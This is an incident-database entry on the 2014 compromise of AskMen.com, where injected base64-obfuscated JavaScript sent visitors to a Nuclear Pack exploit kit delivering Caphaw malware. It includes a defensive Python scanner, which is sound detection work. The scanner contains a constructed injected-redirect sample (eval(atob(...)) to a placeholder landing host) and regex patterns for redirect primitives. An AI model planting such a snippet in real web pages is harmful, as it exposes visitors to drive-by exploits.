Cyber Incident Victim: AskMen
Date: Jun 2014
Location: United States of America
Summary
The men's lifestyle website Askmen.com was reportedly compromised via malicious code injection that redirected visitors to pages hosting exploits targeting vulnerabilities in outdated Java and Adobe Reader software, potentially enabling unauthorized access to user systems. Security researchers identified obfuscated base64-encoded scripts linked to the Nuclear Pack exploit kit, which delivered Caphaw malware capable of data theft and fraudulent activities. While the researchers attributed the attack to actors leveraging automated domain generation, the website operators initially denied any compromise, stating internal investigations found no evidence of malware and emphasizing existing security protocols, though they later acknowledged engaging with external claims of the incident.
Description
In June 2014, the Askmen.com website—an online men’s publication with over 14 million U.S. readers and international editions—was reported to have been compromised through malicious code injection. Security researchers at Websense identified obfuscated JavaScript code inserted at the bottom of site pages, redirecting visitors to exploit-laden domains. The injected code used base64 encoding to conceal its function, which involved directing users to pages hosting exploits targeting Java (CVE-2013-2465) and Adobe Reader vulnerabilities. The Java vulnerability affected versions 7 update 21 and earlier, enabling attackers to compromise confidentiality, integrity, and availability through unspecified vectors. Websense linked the attack to a domain generation algorithm (DGA) that dynamically created landing pages until June 30, 2014. The exploit page’s obfuscation techniques matched those historically associated with the Nuclear Pack exploit kit, which was known to leverage the same Java flaw. The final payload delivered to victims was identified as Caphaw malware, a threat linked to Russian and Ukrainian actors and capable of click fraud, search hijacking, and information theft.
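The description above gives the detection-relevant shape of the compromise: an obfuscated script block appended to the bottom of otherwise legitimate pages, base64-encoded so that a quick glance does not reveal the redirect to an off-site exploit landing page. The following Python scanner is an added example, not code from Websense, AskMen or the original report. It walks the script tags of a page, decodes any base64-looking runs that decode cleanly to text, and flags those whose decoded content contains a redirect primitive pointing at a host outside an allow-list. The sample page and the decoded redirect target (`landing.example.invalid`) are constructed for the example and are not the real 2014 payload or domains.

```python
import base64
import re

# Constructed sample page: a benign page with one injected script appended at the bottom.
# The base64 blob decodes to a constructed redirect snippet, not the real 2014 payload.
INJECTED_JS = 'window.location.href="http://landing.example.invalid/page.php";'
INJECTED_B64 = base64.b64encode(INJECTED_JS.encode()).decode()

SAMPLE_HTML = f"""<html><head><title>Sample</title>
<script src="/static/site.js"></script></head>
<body><p>Article body</p>
<script>eval(atob("{INJECTED_B64}"));</script>
</body></html>"""

# Script bodies, including empty ones for external <script src=...> tags.
SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.IGNORECASE | re.DOTALL)
# Long runs of base64 alphabet characters, with optional padding.
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
# Primitives commonly used to send the browser somewhere else or embed a hidden frame.
REDIRECT_RE = re.compile(r"(window\.location|top\.location|document\.write|<iframe)", re.IGNORECASE)
HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")


def decode_b64_candidates(script_body):
    """Return the decoded text of every base64-looking run that decodes to valid UTF-8."""
    decoded = []
    for match in B64_RE.finditer(script_body):
        try:
            text = base64.b64decode(match.group(0), validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            # Not real base64 (bad padding/length) or binary content; skip it.
            continue
        decoded.append(text)
    return decoded


def scan_html(html, trusted_hosts):
    """Flag inline scripts that hide a redirect behind base64 encoding.

    trusted_hosts: set of hostnames the site legitimately sends browsers to.
    Returns a list of findings; an empty list means nothing suspicious was seen.
    """
    findings = []
    for index, match in enumerate(SCRIPT_RE.finditer(html)):
        body = match.group(1)
        for text in decode_b64_candidates(body):
            if not REDIRECT_RE.search(text):
                continue
            off_site = [h for h in HOST_RE.findall(text) if h not in trusted_hosts]
            findings.append({
                "script_index": index,
                # Where in the page the script sits (1.0 == very end), since the
                # injected block in this incident was appended at the bottom.
                "position": round(match.start() / len(html), 2),
                "reason": "base64-encoded redirect",
                "hosts": off_site,
                "decoded": text,
            })
    return findings


if __name__ == "__main__":
    for finding in scan_html(SAMPLE_HTML, {"www.example-site.invalid"}):
        print(finding)
```

The decoder deliberately uses `validate=True` and requires a clean UTF-8 decode, so random-looking tokens such as minified variable names or hashes are not reported; in production the same logic would run over a crawl of the site's own pages and alert on any off-site host that is not already in the allow-list, which is exactly the signal a site operator could have used to confirm or rule out the injection described above.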

Askmen.com initially denied awareness of any compromise when contacted by reporters on June 23, with Audience Development Manager Sophie Laplante stating their developers found no malware and that Websense had not alerted them. By June 25, Askmen issued an updated statement confirming a thorough investigation had revealed no evidence of malware but acknowledged engaging with the vendor (Websense) that reported the incident. Websense’s analysis indicated the attack’s infrastructure and methods aligned with Nuclear Pack’s patterns, though Askmen maintained its security measures were robust. The incident highlighted risks to users running outdated Java versions, as the exploit targeted unpatched systems despite Java 7 update 60 being available. No user impact statistics or specific containment actions by Askmen were disclosed beyond their internal review and vendor communication.
